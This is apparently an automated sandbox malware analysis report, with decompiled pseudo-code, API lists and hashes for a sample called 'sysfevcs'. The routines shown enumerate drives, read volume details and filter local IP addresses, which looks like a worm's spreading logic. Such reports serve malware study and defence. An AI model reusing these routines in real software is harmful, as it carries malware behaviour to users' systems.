                                                                                                                                                                                                                                                                  • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                  • Opcode ID: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction ID: e4e2bc4ae20f5a24e0f583b0843f83e65f824e6296bed8a186bd164e60841b18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7514C75901228DBDB36CB50CD94BD973B8AB08705F1041E9A60DBA2C1D7B96FC8CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                                                                                                  			E004051D0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v556;
                                                                                                                                                                                                                                                                  				short _v2604;
                                                                                                                                                                                                                                                                  				intOrPtr _v2608;
                                                                                                                                                                                                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                  				long _v2616;
                                                                                                                                                                                                                                                                  				short _v3148;
                                                                                                                                                                                                                                                                  				intOrPtr _v3152;
                                                                                                                                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				struct %anon54 _t43;
                                                                                                                                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                                                                                                                                  				void* _t68;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				void* _t70;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				GetModuleFileNameW(0, 0x412f78, 0x104);
                                                                                                                                                                                                                                                                  				_t34 = E0040CEA0(0x412f78);
                                                                                                                                                                                                                                                                  				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                  				 *0x412f70 = _t34;
                                                                                                                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = E004049E0();
                                                                                                                                                                                                                                                                  					_v12 = 2;
                                                                                                                                                                                                                                                                  					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                  						_t38 = E00404980(_v8, _v12,  &_v24);
                                                                                                                                                                                                                                                                  						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                  						_v16 = _t38;
                                                                                                                                                                                                                                                                  						_v3152 = _v16;
                                                                                                                                                                                                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0x40000000);
                                                                                                                                                                                                                                                                  							_t63 = _v2608;
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                  							_push(_t43);
                                                                                                                                                                                                                                                                  							L0040EB30();
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                  							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                  								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                  							E00404CF0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                  							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x7d0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x004051de
                                                                                                                                                                                                                                                                  0x004051f0
                                                                                                                                                                                                                                                                  0x004051fb
                                                                                                                                                                                                                                                                  0x00405200
                                                                                                                                                                                                                                                                  0x00405203
                                                                                                                                                                                                                                                                  0x00405208
                                                                                                                                                                                                                                                                  0x0040521a
                                                                                                                                                                                                                                                                  0x0040521d
                                                                                                                                                                                                                                                                  0x0040522f
                                                                                                                                                                                                                                                                  0x00405245
                                                                                                                                                                                                                                                                  0x0040524a
                                                                                                                                                                                                                                                                  0x0040524d
                                                                                                                                                                                                                                                                  0x00405253
                                                                                                                                                                                                                                                                  0x00405260
                                                                                                                                                                                                                                                                  0x0040528f
                                                                                                                                                                                                                                                                  0x004052a4
                                                                                                                                                                                                                                                                  0x004052aa
                                                                                                                                                                                                                                                                  0x004052ac
                                                                                                                                                                                                                                                                  0x004052b1
                                                                                                                                                                                                                                                                  0x004052b7
                                                                                                                                                                                                                                                                  0x004052b8
                                                                                                                                                                                                                                                                  0x004052be
                                                                                                                                                                                                                                                                  0x004052bf
                                                                                                                                                                                                                                                                  0x004052c4
                                                                                                                                                                                                                                                                  0x004052d2
                                                                                                                                                                                                                                                                  0x004052d8
                                                                                                                                                                                                                                                                  0x004052e4
                                                                                                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x00405315
                                                                                                                                                                                                                                                                  0x0040533b
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040535a

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004051DE
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00412F78,00000104), ref: 004051F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: CreateFileW.KERNEL32(00405200,80000000,00000001,00000000,00000003,00000000,00000000,00405200), ref: 0040CEC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CED5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: CloseHandle.KERNEL32(000000FF), ref: 0040CEE2
                                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0040535A
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegCloseKey.ADVAPI32(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040534D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404980: lstrcpyW.KERNEL32 ref: 004049D3
                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040528F
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 004052A4
                                                                                                                                                                                                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 004052BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052D2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052F2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405315
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                                  • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                                  • Opcode ID: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction ID: ed61c20226ee7d10f6afdc96e326cade5679569eb23418b562d9eee10a8c52da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24416471900218ABEB24DB94DD45FEF7378AF44700F1041BAF209B55D1DAB45A88CF6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 525 409750-409767 call 409490 528 409769 525->528 529 40976e-40978a call 409200 strstr 525->529 530 409973-409976 528->530 533 40978c-4097a8 call 409200 strstr 529->533 534 4097cd-4097e9 call 409200 strstr 529->534 539 4097c8 533->539 540 4097aa-4097c6 call 409200 strstr 533->540 541 4097eb-409807 call 409200 strstr 534->541 542 40982c-409842 EnterCriticalSection 534->542 539->530 540->534 540->539 553 409827 541->553 554 409809-409825 call 409200 strstr 541->554 543 40984d-409856 542->543 546 409887-409892 call 4096a0 543->546 547 409858-409868 543->547 560 409968-40996d LeaveCriticalSection 546->560 561 409898-4098a6 546->561 550 409885 547->550 551 40986a-409883 call 40bb80 547->551 550->543 551->546 553->530 554->542 554->553 560->530 563 4098a8 561->563 564 4098ac-4098bd call 408820 561->564 563->564 564->560 567 4098c3-4098e0 call 40bb80 564->567 570 4098e2-4098f1 567->570 571 409937-409950 567->571 572 4098f3-4098fb Sleep 570->572 573 4098fd-409935 call 408990 570->573 574 409956-409961 call 4096a0 571->574 572->570 573->574 574->560 579 409963 call 409380 574->579 579->560
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409750(signed int _a4, intOrPtr _a8, signed char _a12) {
                                                                                                                                                                                                                                                                  				signed char _v5;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed char _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				signed char _t50;
                                                                                                                                                                                                                                                                  				char* _t52;
                                                                                                                                                                                                                                                                  				char* _t54;
                                                                                                                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  				char* _t68;
                                                                                                                                                                                                                                                                  				char* _t72;
                                                                                                                                                                                                                                                                  				void* _t97;
                                                                                                                                                                                                                                                                  				void* _t98;
                                                                                                                                                                                                                                                                  				void* _t100;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t109;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = E00409490(_a4);
                                                                                                                                                                                                                                                                  				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                  				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					_t52 = strstr(E00409200(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                  					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t52 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						_t54 = strstr(E00409200(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                  						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                                                                                                                                                  							L10:
                                                                                                                                                                                                                                                                  							EnterCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  							_v5 = 0;
                                                                                                                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								_t55 = _v12;
                                                                                                                                                                                                                                                                  								if(_v12 >=  *0x4139e4) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v12 * 4)) + 4)) != _a4) {
                                                                                                                                                                                                                                                                  									_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t65 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                  								_v5 = 1;
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							E004096A0(_t55);
                                                                                                                                                                                                                                                                  							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  							if(_t57 != 0) {
                                                                                                                                                                                                                                                                  								L27:
                                                                                                                                                                                                                                                                  								LeaveCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  								return _t57;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v13 = 0;
                                                                                                                                                                                                                                                                  							if( *0x4139e4 == 0x200) {
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t57 = E00408820(0xc);
                                                                                                                                                                                                                                                                  							_v20 = _t57;
                                                                                                                                                                                                                                                                  							if(_v20 == 0) {
                                                                                                                                                                                                                                                                  								goto L27;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 8)) = E0040BB80() - _a8;
                                                                                                                                                                                                                                                                  								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									_t60 = _v20;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(0x4139e8 +  *0x4139e4 * 4)) = _v20;
                                                                                                                                                                                                                                                                  									 *0x4139e4 =  *0x4139e4 + 1;
                                                                                                                                                                                                                                                                  									L25:
                                                                                                                                                                                                                                                                  									_t57 = E004096A0(_t60);
                                                                                                                                                                                                                                                                  									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  										_t57 = E00409380(_t57);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L27;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								while( *(0x4139e4[ *0x4139e4]) != 0) {
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *(0x4139e4[ *0x4139e4]) = 1;
                                                                                                                                                                                                                                                                  								E00408990(0x4139e4[ *0x4139e4]);
                                                                                                                                                                                                                                                                  								_t60 =  *0x4139e4;
                                                                                                                                                                                                                                                                  								0x4139e4[ *0x4139e4] = _v20;
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                  						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							return _t68;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                  						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t68 != 0) {
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                  					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t72 == 0) {
                                                                                                                                                                                                                                                                  						L5:
                                                                                                                                                                                                                                                                  						return _t72;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t74 = _a4;
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                  					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t72 != 0) {
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t50;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x0040975a
                                                                                                                                                                                                                                                                  0x0040975f
                                                                                                                                                                                                                                                                  0x00409762
                                                                                                                                                                                                                                                                  0x00409767
                                                                                                                                                                                                                                                                  0x00409780
                                                                                                                                                                                                                                                                  0x00409785
                                                                                                                                                                                                                                                                  0x0040978a
                                                                                                                                                                                                                                                                  0x004097cd
                                                                                                                                                                                                                                                                  0x004097df
                                                                                                                                                                                                                                                                  0x004097e4
                                                                                                                                                                                                                                                                  0x004097e9
                                                                                                                                                                                                                                                                  0x0040982c
                                                                                                                                                                                                                                                                  0x00409831
                                                                                                                                                                                                                                                                  0x00409837
                                                                                                                                                                                                                                                                  0x0040983b
                                                                                                                                                                                                                                                                  0x0040984d
                                                                                                                                                                                                                                                                  0x0040984d
                                                                                                                                                                                                                                                                  0x00409856
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409868
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x0040986a
                                                                                                                                                                                                                                                                  0x0040986f
                                                                                                                                                                                                                                                                  0x0040987c
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00409887
                                                                                                                                                                                                                                                                  0x0040988c
                                                                                                                                                                                                                                                                  0x00409892
                                                                                                                                                                                                                                                                  0x00409968
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00409898
                                                                                                                                                                                                                                                                  0x004098a6
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098ae
                                                                                                                                                                                                                                                                  0x004098b6
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004098c3
                                                                                                                                                                                                                                                                  0x004098c9
                                                                                                                                                                                                                                                                  0x004098d7
                                                                                                                                                                                                                                                                  0x004098e0
                                                                                                                                                                                                                                                                  0x0040993d
                                                                                                                                                                                                                                                                  0x00409940
                                                                                                                                                                                                                                                                  0x00409950
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x00409961
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409961
                                                                                                                                                                                                                                                                  0x004098e2
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x0040990a
                                                                                                                                                                                                                                                                  0x0040991e
                                                                                                                                                                                                                                                                  0x00409926
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x004097fd
                                                                                                                                                                                                                                                                  0x00409802
                                                                                                                                                                                                                                                                  0x00409807
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040981b
                                                                                                                                                                                                                                                                  0x00409820
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x0040979e
                                                                                                                                                                                                                                                                  0x004097a3
                                                                                                                                                                                                                                                                  0x004097a8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097af
                                                                                                                                                                                                                                                                  0x004097bc
                                                                                                                                                                                                                                                                  0x004097c1
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostname.WS2_32(?,00000100), ref: 004094AC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostbyname.WS2_32(?), ref: 004094BE
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 00409780
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 0040979E
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 004097BC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                  • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                  • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                  • Opcode ID: 8f7452eed3e96897848a9a3fd55ea4c3c03ecd81d5e18edef44a32495c4258d7
                                                                                                                                                                                                                                                                  • Instruction ID: 0e6ba8cad48665767f72902f7a1038e3695d8b3c4a802ec0be8d7a0393df22e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7452eed3e96897848a9a3fd55ea4c3c03ecd81d5e18edef44a32495c4258d7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0651C4F5A10204ABDB00EF61E842BAB7B65AB44305F14843FE944773C3D67ADA44CA9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                                                                                                  			E0040B9B0(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				LONG* _v16;
                                                                                                                                                                                                                                                                  				signed char _v17;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = _a4;
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                  						while(1 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									L15:
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                  									_a8 = _t80;
                                                                                                                                                                                                                                                                  									if(_t80 != 0) {
                                                                                                                                                                                                                                                                  										goto L15;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L16:
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040b9c3
                                                                                                                                                                                                                                                                  0x0040b9cf
                                                                                                                                                                                                                                                                  0x0040b9d5
                                                                                                                                                                                                                                                                  0x0040b9e0
                                                                                                                                                                                                                                                                  0x0040b9e9
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040ba09
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040ba19
                                                                                                                                                                                                                                                                  0x0040ba27
                                                                                                                                                                                                                                                                  0x0040ba2d
                                                                                                                                                                                                                                                                  0x0040ba3f
                                                                                                                                                                                                                                                                  0x0040ba56
                                                                                                                                                                                                                                                                  0x0040ba72
                                                                                                                                                                                                                                                                  0x0040ba7a
                                                                                                                                                                                                                                                                  0x0040ba82
